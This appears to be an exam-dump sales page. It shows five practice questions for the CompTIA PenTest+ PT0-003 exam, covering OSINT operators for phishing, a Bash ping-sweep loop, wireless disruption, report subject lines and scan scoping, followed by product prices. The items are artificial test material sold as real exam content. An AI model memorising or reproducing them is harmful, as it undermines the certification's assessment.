A penetration tester is using OSINT to identify client email addresses found on the web for a phishing campaign. Which of the following is the best search operator for the tester to use?

Options:

A.

site:

B.

intitle:

C.

intext:

D.

inurl:

Buy Now
Questions 96

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part 1: Given the output, construct the command that was used to generate this output from the available options.

Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Buy Now
Questions 97

A penetration tester writes a Bash script to automate the execution of a ping command on a Class C network:

bash

for var in —MISSING TEXT—

do

ping -c 1 192.168.10.$var

done

Which of the following pieces of code should the penetration tester use in place of the —MISSING TEXT— placeholder?

Options:

A.

crunch 1 254 loop

B.

seq 1 254

C.

echo 1-254

D.

{1.-254}

Buy Now
Questions 98

A penetration testing team needs to determine whether it is possible to disrupt the wireless communications for PCs deployed in the client ' s offices. Which of the following techniques should the penetration tester leverage?

Options:

A.

Port mirroring

B.

Sidecar scanning

C.

ARP poisoning

D.

Channel scanning

Buy Now
Questions 99

An external legal firm is conducting a penetration test of a large corporation. Which of the following would be most appropriate for the legal firm to use in the subject line of a weekly email update?

Options:

A.

Privileged & Confidential Status Update

B.

Action Required Status Update

C.

Important Weekly Status Update

D.

Urgent Status Update

Buy Now
Questions 100

During a vulnerability assessment, a penetration tester configures the scanner sensor and performs the initial vulnerability scanning under the client ' s internal network. The tester later discusses the results with the client, but the client does not accept the results. The client indicates the host and assets that were within scope are not included in the vulnerability scan results. Which of the following should the tester have done?

Options:

A.

Rechecked the scanner configuration.

B.

Performed a discovery scan.

C.

Used a different scan engine.

D.

Configured all the TCP ports on the scan.

Buy Now
Exam Code: PT0-003
Exam Name: CompTIA PenTest+ Exam
Last Update: Jun 29, 2026
Questions: 330
PT0-003 pdf

PT0-003 PDF

$25.5  $84.99
PT0-003 Engine

PT0-003 Testing Engine

$30  $99.99
PT0-003 PDF + Engine

PT0-003 PDF + Testing Engine

$40.5  $134.99